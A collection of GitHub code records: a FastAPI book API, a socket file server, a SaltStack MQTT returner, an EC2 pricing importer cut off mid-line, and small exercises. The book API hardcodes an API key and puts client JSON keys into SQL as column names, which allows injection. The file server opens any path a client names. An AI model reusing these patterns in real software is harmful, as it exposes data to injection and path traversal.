memo)\n","repo_name":"KKosukeee/CodingQuestions","sub_path":"LeetCode/718_maximum_length_of_repeated_subarray.py","file_name":"718_maximum_length_of_repeated_subarray.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11288889453","text":"from typing import Optional\r\nfrom fastapi import FastAPI, Request, HTTPException\r\nfrom sqlite3 import Error, connect, version\r\n\r\n\r\ndef create_connection(db_file):\r\n    \"\"\" create a database connection to the SQLite database\r\n        specified by db_file\r\n    :param db_file: database file\r\n    :return: Connection object or None\r\n    \"\"\"\r\n    conn = None\r\n    try:\r\n        conn = connect(db_file, check_same_thread=False)\r\n    except Error as e:\r\n        print(e)\r\n\r\n    return conn\r\n\r\n\r\ndef create_table_books():\r\n    sql_script_make_books 
= \"\"\"\r\n CREATE TABLE IF NOT EXISTS books (\r\n title text NOT NULL,\r\n isbn13 text PRIMARY KEY,\r\n details text,\r\n publisher text,\r\n year integer,\r\n price real\r\n );\r\n \"\"\"\r\n try:\r\n c = conn.cursor()\r\n c.execute(sql_script_make_books)\r\n c.close()\r\n except Error as e:\r\n print(e)\r\n\r\n\r\ndef create_book(book):\r\n \"\"\"\r\n Create a new book\r\n :param conn:\r\n :param book:\r\n \"\"\"\r\n script = ''' INSERT INTO books(title, isbn13, details, publisher, year, price) VALUES(?,?,?,?,?,?)'''\r\n c = conn.cursor()\r\n c.execute(script, book)\r\n conn.commit()\r\n c.close()\r\n\r\n\r\ndef update_book(update_list, isbn13):\r\n \"\"\"\r\n update book\r\n :param conn:\r\n :param book:\r\n :param isbn13:\r\n \"\"\"\r\n c = conn.cursor()\r\n for key, value in update_list.items():\r\n c.execute('UPDATE books SET %s = ? WHERE isbn13 = ?' %\r\n key, [value] + [isbn13])\r\n conn.commit()\r\n c.close()\r\n\r\n\r\ndef delete_book(isbn13):\r\n \"\"\"\r\n Delete a book by isbn13\r\n :param conn: Connection to the SQLite database\r\n :param isbn13: isbn13\r\n :return:\r\n \"\"\"\r\n c = conn.cursor()\r\n c.execute('DELETE FROM books WHERE isbn13=?', (isbn13,))\r\n conn.commit()\r\n c.close()\r\n\r\n\r\ndef select_books():\r\n \"\"\"\r\n Query all rows in the tasks table\r\n :param conn: the Connection object\r\n :return:\r\n \"\"\"\r\n c = conn.cursor()\r\n c.execute(\"SELECT * FROM books\")\r\n\r\n rows = c.fetchall()\r\n c.close()\r\n\r\n return rows\r\n\r\n\r\ndef select_book_by_isbn13(isbn13):\r\n \"\"\"\r\n Query a book by isbn13\r\n :param conn: the Connection object\r\n :param isbn13:\r\n :return:\r\n \"\"\"\r\n c = conn.cursor()\r\n c.execute(\"SELECT * FROM books WHERE isbn13=?\", (isbn13,))\r\n\r\n row = c.fetchone()\r\n\r\n return row\r\n\r\n\r\napp = FastAPI()\r\nconn = create_connection('books.db')\r\napi_key = 'hK0iP5dL7bW3fP3y'\r\n\r\nif __name__ == '__main__':\r\n # test\r\n c = conn.cursor()\r\n c.execute(\"DROP TABLE IF EXISTS books;\")\r\n create_table_books()\r\n c.execute(\"DELETE FROM books;\")\r\n\r\n test_isbn13 = 12321321\r\n test_book = (\"hey\", test_isbn13, \"details1\", \"publisher2\", 2021, 15.00)\r\n\r\n create_book(test_book)\r\n print(select_book_by_isbn13(test_isbn13))\r\n\r\n update_book(('newbook', \"newdetail\", \"newpub\", 1999, 9999.99), test_isbn13)\r\n print(select_book_by_isbn13(test_isbn13))\r\n\r\n delete_book(test_isbn13)\r\n print(select_book_by_isbn13(test_isbn13))\r\n\r\n\r\nasync def api_key_check(request):\r\n try:\r\n if request.query_params[\"apikey\"] != api_key:\r\n raise HTTPException(401)\r\n except:\r\n raise HTTPException(401)\r\n\r\n\r\n@app.get(\"/books\")\r\nasync def select_books_app(request: Request):\r\n await api_key_check(request)\r\n books = select_books()\r\n temp = {\"total\": len(books), \"books\": books}\r\n print(temp)\r\n\r\n return temp\r\n\r\n\r\n@app.get(\"/books/{isbn13}\")\r\nasync def select_book_app(request: Request, isbn13: str):\r\n await api_key_check(request)\r\n\r\n book = select_book_by_isbn13(isbn13)\r\n print(book)\r\n return book\r\n\r\n\r\n@app.post(\"/books\")\r\nasync def create_book_app(request: Request):\r\n await api_key_check(request)\r\n data = await request.json()\r\n try:\r\n create_book(\r\n (data[\"title\"],\r\n data[\"isbn13\"],\r\n data[\"details\"],\r\n data[\"publisher\"],\r\n int(data[\"year\"]),\r\n float(data[\"price\"]),)\r\n )\r\n except:\r\n return {\r\n \"status\": 1,\r\n \"message\": \"Book already exists, use PUT to update\",\r\n }\r\n\r\n return {\r\n \"status\": 
0,\r\n        \"message\": \"Book added\",\r\n    }\r\n\r\n\r\n@app.put(\"/books/{isbn13}\")\r\nasync def update_book_app(request: Request, isbn13: str):\r\n    await api_key_check(request)\r\n\r\n    data = await request.json()\r\n    try:\r\n        update_book(data, isbn13)\r\n    except:\r\n        return {\r\n            \"status\": 1,\r\n            \"message\": \"Error occurred\",\r\n        }\r\n\r\n    return {\r\n        \"status\": 0,\r\n        \"message\": \"Book updated\",\r\n    }\r\n\r\n\r\n@app.delete(\"/books/{isbn13}\")\r\nasync def delete_book_app(request: Request, isbn13: str):\r\n    await api_key_check(request)\r\n\r\n    try:\r\n        delete_book(isbn13)\r\n    except:\r\n        return {\r\n            \"status\": 1,\r\n            \"message\": \"Error occurred\",\r\n        }\r\n\r\n    return {\r\n        \"status\": 0,\r\n        \"message\": \"Book deleted\",\r\n    }\r\n","repo_name":"whqkdhfh13/cmput401_api1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17755297064","text":"import python_ie221 as p1\nimport pickle\n \n# Read data\ndt = p1.ReadData('data\\Combined_News_DJIA.csv')\n\n# Preprocessing\npre = p1.PreProcessing()\n\npre.fully_preprocess(dt.data)\n\n# Processing\nprocess = p1.Processing(pre.x_train, pre.x_test, pre.y_train, pre.y_test)\nprocess.RandomForest()\nprocess.KNNClassifier()\nprocess.Naive()\nprocess.SVMLinearSVC()\n\n# Result\nresult = p1.Result(process)\nresult.full_score()\n\n# Visualize\nvisual = p1.Visualization()\nvisual.result_visualization(pre.pre_data, result.List_score)\n\n# Save the class containing the trained models with pickle\nfilename = \"Model\"\noutfile = open(filename,'wb')\npickle.dump(process,outfile)\noutfile.close()\n\n# Load the class containing the trained models with pickle (optional)\n# infile = open(filename,'rb')\n# class_model = pickle.load(infile)\n# infile.close()","repo_name":"PyProjectIE221/StockMarket-Prediction","sub_path":"main_code.py","file_name":"main_code.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2971632632","text":"import os\r\nimport socket\r\nimport sys\r\nfrom threading import Thread\r\n\r\nHOST = \"127.0.0.1\"\r\n#Enes Delibalta 160401058\r\nPORT=int(input(\"Enter PORT: \"))\r\n\r\n\r\ndef create_socket():\r\n    try:\r\n        global HOST\r\n        global PORT\r\n        global sd\r\n        sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    except socket.error as e:\r\n        print(\"Socket creation error\", str(e))\r\n\r\n\r\ndef bind_socket():\r\n    try:\r\n        global HOST\r\n        global PORT\r\n        global sd\r\n\r\n        sd.bind((HOST, PORT))\r\n        sd.listen(5)\r\n        print(\"Listening on port\", PORT)\r\n    except socket.error as e:\r\n        print(\"Socket bind error \", str(e), \"\\nRetrying\")\r\n        bind_socket()\r\n\r\n\r\ndef socket_accept():\r\n    while True:\r\n        conn, address = sd.accept()\r\n        print(\"Connection established, IP: \", address[0], \":\", address[1])\r\n        try:\r\n            Thread(target=send_data, args=(conn, address)).start()\r\n        except:\r\n            print(\"Error\")\r\n\r\n\r\ndef handleLs(conn):\r\n    datas = os.listdir()\r\n    datas = [i+str(\"\\n\") for i in datas]\r\n    \r\n    size = str(len(datas))\r\n    conn.send(str.encode(size))\r\n    \r\n    for d in datas:\r\n        d = str(d)\r\n        \r\n        conn.send(str.encode(d))\r\n        l = conn.recv(10)\r\n    \r\n\r\n\r\ndef handleGet(conn, filename):\r\n    how_many = conn.recv(20)\r\n    conn.send(str.encode(\"ok\"))\r\n    if how_many.decode(\"utf-8\") == \"$all_$\":\r\n        path = os.getcwd()\r\n        all_files = [f for f in os.listdir(path)\r\n                     if 
os.path.isfile(os.path.join(path, f))]\r\n        ssize = len(all_files)\r\n        conn.send(str.encode(str(ssize)))\r\n        n = conn.recv(10)\r\n        for a_file in all_files:\r\n            conn.send(str.encode(str(a_file)))\r\n            n = conn.recv(10)\r\n            with open(str(a_file), \"rb\") as f:\r\n                l = f.read(1024)\r\n                while (l):\r\n                    conn.send(l)\r\n                    n = conn.recv(10)\r\n                    l = f.read(1024)\r\n            conn.send(str.encode(\"$end$\"))\r\n    else:\r\n        cur_path = os.getcwd()\r\n        if os.path.exists(filename):\r\n            conn.send(str.encode(\"$present$\"))\r\n            istry = conn.recv(20)\r\n            if istry.decode(\"utf-8\") == \"ok\":\r\n                # the with-statement owns the file handle; no manual reopen or close is needed\r\n                with open(filename, \"rb\") as f:\r\n                    l = f.read(1024)\r\n                    while (l):\r\n                        conn.send(l)\r\n                        n = conn.recv(10)\r\n                        print('Sent ', repr(n))\r\n                        l = f.read(1024)\r\n                conn.send(str.encode(\"$end$\"))\r\n        else:\r\n            conn.send(str.encode(\"no such file\"))\r\n\r\n\r\ndef handlePut(conn, filename):\r\n    how_many = conn.recv(20)\r\n    conn.send(str.encode(\"ok\"))\r\n    if how_many.decode(\"utf-8\") == \"$all$\":\r\n        ssize = conn.recv(20)\r\n        conn.send(str.encode(\"ok\"))\r\n        for i in range(int(ssize)):\r\n            fff_name = conn.recv(100)\r\n            fff_name = fff_name.decode(\"utf-8\")\r\n            conn.send(str.encode(\"ok\"))\r\n            with open(fff_name, 'wb') as f:\r\n                data = conn.recv(1024)\r\n                while True:\r\n                    f.write(data)\r\n                    conn.send(str.encode(\"ok\"))\r\n                    data = conn.recv(1024)\r\n                    if data.decode(\"utf-8\") == \"$end$\":\r\n                        print(data.decode(\"utf-8\"))\r\n                        break\r\n    else:\r\n        with open(filename, 'wb') as f:\r\n            data = conn.recv(1024)\r\n            while True:\r\n                f.write(data)\r\n                conn.send(str.encode(\"ok\"))\r\n                data = conn.recv(1024)\r\n                if data.decode(\"utf-8\") == \"$end$\":\r\n                    print(data.decode(\"utf-8\"))\r\n                    break\r\n\r\n\r\ndef send_data(conn, a):\r\n    send_dir = os.getcwd()\r\n    conn.send(str.encode(str(send_dir)))\r\n    while True:\r\n        data = conn.recv(1024)\r\n        data = data.decode(\"utf-8\")\r\n        r_cmd = data.split(\" \")\r\n        cmd = r_cmd[0]\r\n        try:\r\n            filename = r_cmd[1]\r\n        except:\r\n            pass\r\n        if(cmd == \"ls\"):\r\n            handleLs(conn)\r\n        elif(cmd == \"get\"):\r\n            handleGet(conn, filename)\r\n        elif(cmd == \"put\"):\r\n            handlePut(conn, filename)\r\n        else:\r\n            d = \"no such command; use get, put or ls\"\r\n\r\n\r\ndef main():\r\n    create_socket()\r\n    bind_socket()\r\n    socket_accept()\r\n\r\n\r\nmain()\r\n","repo_name":"nyucel/blm304","sub_path":"vize/160401058/sunucu.py","file_name":"sunucu.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"}
+{"seq_id":"37495843236","text":"#Baekjoon 1011\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nfor _ in range(n):\n    x, y = map(int, input().split())\n    \n    count = 0\n    dis = 1\n    \n    while x < y:\n        count += 1\n        x += dis\n        if count % 2 == 0:\n            dis += 1\n    print(count)","repo_name":"meoldae/Algorithm","sub_path":"Boj/Python/Fly_Me_to_the_Alpha_Centauri.py","file_name":"Fly_Me_to_the_Alpha_Centauri.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"9427040921","text":"from inventory_report.inventory import Inventory\nfrom datetime import date, datetime\nfrom operator import attrgetter\n\n\nclass SimpleReport:\n    def add_inventory(self, inventory: Inventory) -> None:\n        self.inventory = inventory.data\n\n    def oldest_manufactured(self) -> str:\n        \"\"\"\n        
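Reference links for the attrgetter / itemgetter sorting approach used here:\n        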
https://siddharth1.medium.com/1-understanding-operator-itemgetter-attribute-or-operator-itemgetter-attribute-27e61754d1fa\n https://www.geeksforgeeks.org/ways-sort-list-dictionaries-values-python-using-itemgetter/\n \"\"\"\n oldest_item = min(self.inventory, key=attrgetter(\"manufacturing_date\"))\n oldest = oldest_item.manufacturing_date\n\n return oldest\n\n def closest_expiration(self) -> str:\n today = str(date.today())\n\n return min(\n product.expiration_date\n for product in self.inventory\n if str(datetime.strptime(product.expiration_date, \"%Y-%m-%d\"))\n > today\n )\n\n def largest_stock(self) -> str:\n largest: dict[str, int] = {}\n\n for product in self.inventory:\n if product.company_name not in largest:\n largest[product.company_name] = 1\n else:\n largest[product.company_name] += 1\n\n return max(largest, key=lambda item: largest[item])\n\n def generate(self) -> str:\n return (\n f\"Oldest manufacturing date: { self.oldest_manufactured() } \"\n f\"Closest expiration date: { self.closest_expiration() } \"\n f\"Company with the largest inventory: { self.largest_stock() } \"\n )\n","repo_name":"jonnoliveira/trybe-project-30-inventory-report","sub_path":"inventory_report/reports/simple_report.py","file_name":"simple_report.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17057042913","text":"import datetime\nimport json\nimport logging\ntry:\n import paho.mqtt.client as mqtt\n HAS_MQTT = True\nexcept ImportError:\n HAS_MQTT = False\ntry:\n import ssl\n HAS_SSL = True\nexcept ImportError:\n HAS_SSL = False\n\nfrom salt.returners import get_returner_options\n\n\nlog = logging.getLogger(__name__)\n\n\n__virtualname__ = \"mqtt\"\n\n\ndef __virtual__():\n if not HAS_MQTT:\n return False, \"Could not import mqtt returner; \" \\\n \"paho mqtt client is not installed.\"\n if not HAS_SSL:\n return False, \"Could not import mqtt returner; \" \\\n \"ssl is not installed.\"\n\n return __virtualname__\n\n\ndef _get_options(ret=None):\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\"Getting options for: {:}\".format(ret))\n\n defaults = {\n \"client_id\": \"\",\n \"clean_session\": None,\n \"protocol\": \"MQTTv311\",\n \"transport\": \"tcp\",\n \"host\": \"localhost\",\n \"port\": 1883,\n \"keepalive\": 60,\n \"bind_address\": \"\",\n \"username\": None,\n \"password\": None,\n \"tls\": {},\n \"proxy\": {},\n \"ws\": {},\n \"topic\": \"\",\n \"qos\": 0,\n \"retain\": False\n }\n\n attrs = {\n \"client_id\": \"client_id\",\n \"clean_session\": \"clean_session\",\n \"protocol\": \"protocol\",\n \"transport\": \"transport\",\n \"host\": \"host\",\n \"port\": \"port\",\n \"keepalive\": \"keepalive\",\n \"bind_address\": \"bind_address\",\n \"username\": \"username\",\n \"password\": \"password\",\n \"tls\": \"tls\",\n \"proxy\": \"proxy\",\n \"ws\": \"ws\",\n \"topic\": \"topic\",\n \"qos\": \"qos\",\n \"retain\": \"retain\"\n }\n\n options = get_returner_options(\n \"{:}_returner\".format(__virtualname__),\n ret,\n attrs,\n __salt__=__salt__,\n __opts__=__opts__,\n defaults=defaults\n )\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\"Generated options: {:}\".format(options))\n\n return options\n\n\ndef _get_client_for(ret):\n\n # Get client instance from context if present\n client = __context__.get(__name__, None)\n\n # Create new instance if no existing found\n if client == None:\n options = _get_options(ret)\n log.info(\"Creating client instance with options: 
{:}\".format(options))\n\n client = mqtt.Client(\n client_id=options[\"client_id\"],\n clean_session=options[\"clean_session\"],\n protocol=getattr(mqtt, options[\"protocol\"], mqtt.MQTTv311), # Resolve MQTT constant\n transport=options[\"transport\"])\n setattr(client, \"metadata\", {})\n\n # Store options in metadata\n client.metadata[\"options\"] = options\n\n if options[\"username\"]:\n client.username_pw_set(options[\"username\"], password=options[\"password\"])\n\n # Setup TLS if defined\n if options[\"tls\"]:\n\n tls_kwargs = {}\n for key, val in options[\"tls\"].iteritems():\n\n # Resolve SSL constants\n if key in [\"cert_reqs\", \"tls_version\"]:\n tls_kwargs[key] = getattr(ssl, val)\n else:\n tls_kwargs[key] = val\n\n client.tls_set(**tls_kwargs)\n\n # Setup proxy if defined\n if options[\"proxy\"]:\n client.proxy_set(**options[\"proxy\"])\n\n # Setup WebSocket if defined\n if options[\"ws\"]:\n client.ws_set(**options[\"ws\"])\n\n # Register callback on connect\n def on_connect(client, userdata, flags, rc):\n if rc == mqtt.MQTT_ERR_SUCCESS:\n log.info(\"Client successfully connected to broker\")\n else:\n log.error(\"Client unable to connect to broker: {:}\".format(mqtt.error_string(rc)))\n\n client.on_connect = on_connect\n\n # Register callback on disconnect\n def on_disconnect(client, userdata, rc):\n log.warn(\"Client disconnected from broker: {:}\".format(mqtt.error_string(rc)))\n \n # Call disconnect to make sure 'is_connected' will return False\n rc = client.disconnect()\n log.info(\"Client disconnect result: {:}\".format(mqtt.error_string(rc)))\n\n client.on_disconnect = on_disconnect\n\n # Connect to the broker\n client.connect(options[\"host\"],\n port=options[\"port\"],\n keepalive=options[\"keepalive\"],\n bind_address=options[\"bind_address\"])\n\n # Run a client loop to make sure 'is_connected' will return True\n rc = client.loop()\n if rc != mqtt.MQTT_ERR_SUCCESS:\n log.error(\"Client loop call after initial connect failed: {:}\".format(mqtt.error_string(rc)))\n\n __context__[__name__] = client\n else:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\"Re-using client instance found in context\")\n\n # Check connection\n if not client.is_connected():\n log.warn(\"Client is no longer connected - attempting to reconnect\")\n\n # Attempt to reconnect\n rc = client.reconnect()\n log.info(\"Client reconnect result: {:}\".format(mqtt.error_string(rc)))\n\n # Run a client loop to make sure 'is_connected' will return True\n rc = client.loop()\n if rc != mqtt.MQTT_ERR_SUCCESS:\n log.error(\"Client loop call after reconnect failed: {:}\".format(mqtt.error_string(rc)))\n\n return client\n\n\ndef returner(ret):\n \"\"\"\n Return a result to MQTT.\n\n Example: salt '*' test.ping --return mqtt --return_kwargs '{\"host\": \"127.0.0.1\", \"port\": 1883}'\n \"\"\"\n\n returner_job(ret)\n\n\ndef returner_job(job):\n \"\"\"\n Return a Salt job result to MQTT.\n \"\"\"\n\n if not job or not job.get(\"jid\", None):\n log.warn(\"Skipping invalid job result: {:}\".format(job))\n\n return\n\n ret = job.get(\"return\", job.get(\"ret\", None))\n\n if not ret or not job.get(\"success\", True): # Default is success if not specified\n log.warn(\"Skipping unsuccessful job result with JID {:}: {:}\".format(job[\"jid\"], job))\n\n return\n\n namespace = job[\"fun\"].split(\".\")\n if isinstance(ret, dict) and \"_type\" in ret:\n\n # Only use module name when type is available\n returner_data(ret, namespace[0], **job)\n else:\n returner_data(ret, *namespace, **job)\n\n\ndef returner_data(data, 
*args, **kwargs):\n \"\"\"\n Return any arbitrary data structure to MQTT.\n \"\"\"\n\n if not data:\n log.debug(\"Skipping empty data result\")\n\n return\n\n client = _get_client_for(kwargs)\n options = client.metadata[\"options\"]\n\n if options[\"topic\"]:\n namespace = [options[\"topic\"]] + list(args)[1:]\n else:\n namespace = list(args)\n\n if isinstance(data, dict):\n payload = data\n\n # Append type to namespace if present and not already added\n if \"_type\" in data and not options[\"topic\"] and not data[\"_type\"] in namespace:\n namespace.append(data[\"_type\"])\n\n if not \"_stamp\" in data:\n data[\"_stamp\"] = datetime.datetime.utcnow().isoformat()\n\n elif isinstance(data, (list, set, tuple)):\n payload = {\n \"_stamp\": datetime.datetime.utcnow().isoformat(),\n \"values\": data\n }\n else:\n payload = {\n \"_stamp\": datetime.datetime.utcnow().isoformat(),\n \"value\": data\n }\n\n # Publish message\n topic = \"/\".join(namespace)\n res = client.publish(topic, json.dumps(payload, separators=(\",\", \":\")), qos=options[\"qos\"], retain=options[\"retain\"])\n if res.rc != mqtt.MQTT_ERR_SUCCESS:\n log.warn(\"Publish of message with topic '{:}' failed: {:}\".format(topic, mqtt.error_string(res.rc)))\n","repo_name":"autopi-io/autopi-core","sub_path":"src/salt/base/ext/_returners/mqtt_returner.py","file_name":"mqtt_returner.py","file_ext":"py","file_size_in_byte":7658,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"21"} +{"seq_id":"693146143","text":"import requests, os\nimport urllib.parse as up\nfrom sys import argv\nimport configparser\n\n\nconfig = configparser.ConfigParser()\nconfig.read(os.path.join(os.environ[\"HOME\"], \".wiki\", \"config\"))\nlocale = config[\"default\"][\"locale\"]\n\ndef main(users_query, *options):\n\t# wiki api\n\thost = 'https://{}.wikipedia.org/w/api.php?'.format(locale)\n\t# actions\n\tsearch = '&'.join([\n\t\t\t\t\t\t'action=opensearch',\n\t\t\t\t\t\t'search={}'.format(up.quote(users_query)),\n\t\t\t\t\t\t'prop=info',\n\t\t\t\t\t\t'format=json',\n\t\t\t\t\t\t'inprop=url'\n\t\t\t\t\t\t])\n\t# full url\n\turl = host + search\n\t# request\n\tresponce = requests.get(url)\n\tif (responce.status_code != requests.codes.ok):\n\t\tprint(\"Bad request (status code {})\".format(responce.status_code))\n\t\texit\n\n\tfor ans in responce.json()[2]:\n\t\tprint(ans)\n\nif __name__ == \"__main__\":\n\tmain(argv[1])\n","repo_name":"goncharoman/wiki","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4439124565","text":"import numpy as np\nimport chainer\nimport chainer.links as L\nimport chainer.functions as F\n\nclass CNN(chainer.Chain):\n def __init__(self):\n # クラスの初期化\n super(CNN, self).__init__( \n conv1 = L.Convolution2D(1, 20, 4), # フィルター3 ボケを作ってる、入力、出力\n conv2 = L.Convolution2D(20, 30, 3), # フィルター4\n conv3 = L.Convolution2D(30, 40, 3),\n conv4 = L.Convolution2D(40, 50, 3),\n\n l1 = L.Linear(800, 500),\n l2 = L.Linear(500, 500),\n l3 = L.Linear(500, 10, initialW=np.zeros((10, 500), dtype=np.float32))\n )\n \n def __call__(self,x):\n # 順伝播の計算を行う関数\n # :param x: 入力値\n h = F.max_pooling_2d(F.dropout(F.relu(self.conv1(x))), 2)\n h = F.max_pooling_2d(F.dropout(F.relu(self.conv2(h))), 2)\n h = F.max_pooling_2d(F.dropout(F.relu(self.conv3(h))), 2)\n h = F.dropout(F.relu(self.conv4(h)))\n\n h = F.relu(self.l1(h))\n h = F.relu(self.l2(h))\n y = self.l3(h)\n return 
y","repo_name":"AtomScott/Crosslingual-audio-emotion-recognition-with-RAVDESS-and-XperDES","sub_path":"models/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36056816798","text":"#!/usr/bin/env python3\n\nimport site\nimport sys\n\nnew_sys_path = set(sys.path)\nfor path in site.getsitepackages():\n if path in new_sys_path:\n new_sys_path.remove(path)\nsys.path[0:] = new_sys_path\n\nimport os.path\n\nif __name__ == '__main__':\n # sys.path.append('/usr/lib/libreoffice/program')\n sys.path.append('/usr/lib/python3/dist-packages')\n import uno\n import unohelper\n sys.path.remove('/usr/lib/python3/dist-packages')\n sys.path.append(os.path.join(os.path.dirname(__file__),\n 'pythonpath'))\n\n\nimport argparse\nimport collections\nimport csv\nimport io\nimport logging\nimport os\nimport traceback\nimport urllib.request\n\nimport boto3\nimport uno # NOQA\nimport unohelper # NOQA\nfrom com.sun.star.sheet.CellFlags import VALUE\nfrom com.sun.star.sheet.CellFlags import DATETIME\nfrom com.sun.star.sheet.CellFlags import STRING\nfrom com.sun.star.sheet.CellFlags import ANNOTATION\nfrom com.sun.star.sheet.CellFlags import FORMULA\nfrom com.sun.star.sheet.CellFlags import HARDATTR\nfrom com.sun.star.sheet.CellFlags import STYLES\nfrom com.sun.star.sheet.CellFlags import OBJECTS\nfrom com.sun.star.sheet.CellFlags import EDITATTR\nfrom com.sun.star.sheet.CellFlags import FORMATTED\nfrom com.sun.star.task import XJob\nfrom com.sun.star.container import NoSuchElementException\nfrom com.sun.star.awt.FontWeight import BOLD\n\nBOOTSTRAP_REGION = 'us-east-1'\n\nALL_CELL_FLAGS = (VALUE | DATETIME | STRING | ANNOTATION | FORMULA |\n HARDATTR | STYLES | OBJECTS | EDITATTR | FORMATTED)\n\ng_ImplementationHelper = unohelper.ImplementationHelper()\n\n\ndef _get_or_create_sheet(doc, sheet_name):\n try:\n sheet = doc.Sheets.getByName(sheet_name)\n except NoSuchElementException:\n doc.Sheets.insertNewByName(sheet_name, doc.Sheets.Count)\n sheet = doc.Sheets.getByName(sheet_name)\n return sheet\n\n\nclass ImportEC2Pricing(unohelper.Base, XJob):\n EC2_PRICE_LIST_URL = ('https://pricing.us-east-1.amazonaws.com/offers/'\n 'v1.0/aws/AmazonEC2/current/index.csv')\n PRICE_LIST_HEADER_FIELDS = [\n 'FormatVersion', 'Disclaimer', 'Publication Date', 'Version',\n 'OfferCode']\n PRICING_SHEET_NAME = 'pricing data'\n PRICING_METADATA_SHEET_NAME = 'pricing metadata'\n NUM_DATA_ROWS_TO_LOAD = 1000\n\n def __init__(self, ctx):\n self.ctx = ctx\n\n def _get_pricing_metadata(self, pricing_csv_text):\n metadata = collections.OrderedDict()\n buf = io.StringIO()\n for i in range(len(self.PRICE_LIST_HEADER_FIELDS)):\n current_char = None\n while current_char != '\\n':\n current_char = pricing_csv_text.read(1)\n buf.write(current_char)\n\n buf.seek(0)\n csv_data = csv.reader(buf)\n for row, expected_header_field in zip(csv_data,\n self.PRICE_LIST_HEADER_FIELDS):\n if row[0] != expected_header_field:\n raise Exception('Incorrect header field detected: {}'.format(\n row[0]))\n\n metadata[row[0]] = row[1]\n\n return metadata\n\n def _get_pricing_lines(self, pricing_lines_csv_text):\n data = []\n csv_data = csv.reader(pricing_lines_csv_text)\n\n csv_iter = iter(csv_data)\n header_row = next(csv_iter)\n for row in csv_iter:\n data.append(tuple(row))\n\n return tuple(header_row), tuple(data)\n\n def _get_pricing_data(self):\n with urllib.request.urlopen(self.EC2_PRICE_LIST_URL) as r, \\\n io.TextIOWrapper(\n r,\n 
encoding=r.headers.get_content_charset('utf-8')) \\\n as pricing_text:\n metadata = self._get_pricing_metadata(pricing_text)\n headers, data = self._get_pricing_lines(pricing_text)\n\n return metadata, headers, data\n\n def _update_pricing_metadata_sheet(self, sheet, metadata):\n sheet.clearContents(ALL_CELL_FLAGS)\n for row, row_key in enumerate(metadata):\n cell_range = sheet.getCellRangeByPosition(0, row, 1, row)\n cell_range.setDataArray(((row_key, metadata[row_key]),))\n\n def _update_pricing_data_sheet(\n self, sheet, headers, data_rows, status_indicator):\n sheet.clearContents(ALL_CELL_FLAGS)\n cell_range = sheet.getCellRangeByPosition(0, 0, len(headers) - 1, 0)\n cell_range.setDataArray((tuple(headers),))\n cell_range.CharWeight = BOLD\n\n all_data_range = sheet.getCellRangeByPosition(\n 0, 1, len(headers)-1, len(data_rows))\n print('len(data_rows): {}'.format(len(data_rows)))\n status_indicator.start('Loading pricing data...', len(data_rows))\n for start_row in range(0, len(data_rows) - self.NUM_DATA_ROWS_TO_LOAD,\n self.NUM_DATA_ROWS_TO_LOAD):\n print('loading start row: {}'.format(start_row))\n end_row = start_row + self.NUM_DATA_ROWS_TO_LOAD\n current_range = all_data_range.getCellRangeByPosition(\n 0, start_row, len(headers)-1, end_row - 1)\n current_range.setDataArray(data_rows[start_row:end_row])\n status_indicator.setValue(end_row)\n else:\n start_row = start_row + self.NUM_DATA_ROWS_TO_LOAD\n if start_row < len(data_rows):\n print('loading start row: {}'.format(start_row))\n end_row = len(data_rows)\n cell_range = all_data_range.getCellRangeByPosition(\n 0, start_row, len(headers)-1, end_row - 1)\n cell_range.setDataArray(data_rows[start_row:end_row])\n status_indicator.setValue(end_row)\n status_indicator.end()\n print('Row loaded: {}'.format(end_row))\n\n def execute(self, args):\n desktop = self.ctx.ServiceManager.createInstanceWithContext(\n \"com.sun.star.frame.Desktop\", self.ctx)\n\n doc = desktop.getCurrentComponent()\n\n pricing_data_sheet = _get_or_create_sheet(doc, self.PRICING_SHEET_NAME)\n pricing_metadata_sheet = _get_or_create_sheet(\n doc, self.PRICING_METADATA_SHEET_NAME)\n\n pricing_metadata, pricing_data_headers, pricing_data = (\n self._get_pricing_data())\n\n try:\n self._update_pricing_metadata_sheet(\n pricing_metadata_sheet, pricing_metadata)\n status_indicator = (\n doc.getCurrentController().getFrame().createStatusIndicator())\n import datetime\n start = datetime.datetime.now()\n self._update_pricing_data_sheet(\n pricing_data_sheet, pricing_data_headers, pricing_data,\n status_indicator)\n end = datetime.datetime.now()\n print(end-start)\n except:\n print(traceback.format_exc())\n\n\ng_ImplementationHelper.addImplementation(\n ImportEC2Pricing,\n 'org.penguintechs.wt.libreoffice.ImportEC2Pricing',\n ('com.sun.star.task.Job',),)\n\n\nclass ImportEC2InstanceData(unohelper.Base, XJob):\n INSTANCE_COUNTS_SHEET_NAME = 'current instance counts'\n INSTANCE_COUNTS_SHEET_HEADERS = ('az', 'service', 'instance_type', 'count')\n RESERVED_INSTANCE_COUNTS_SHEET_NAME = 'current reserved instance counts'\n RESERVED_INSTANCE_COUNTS_SHEET_HEADERS = ('az', 'instance_type', 'count')\n\n def __init__(self, ctx):\n self.ctx = ctx\n\n def _get_all_regions(self):\n print('Getting list of regions')\n client = boto3.client('ec2', 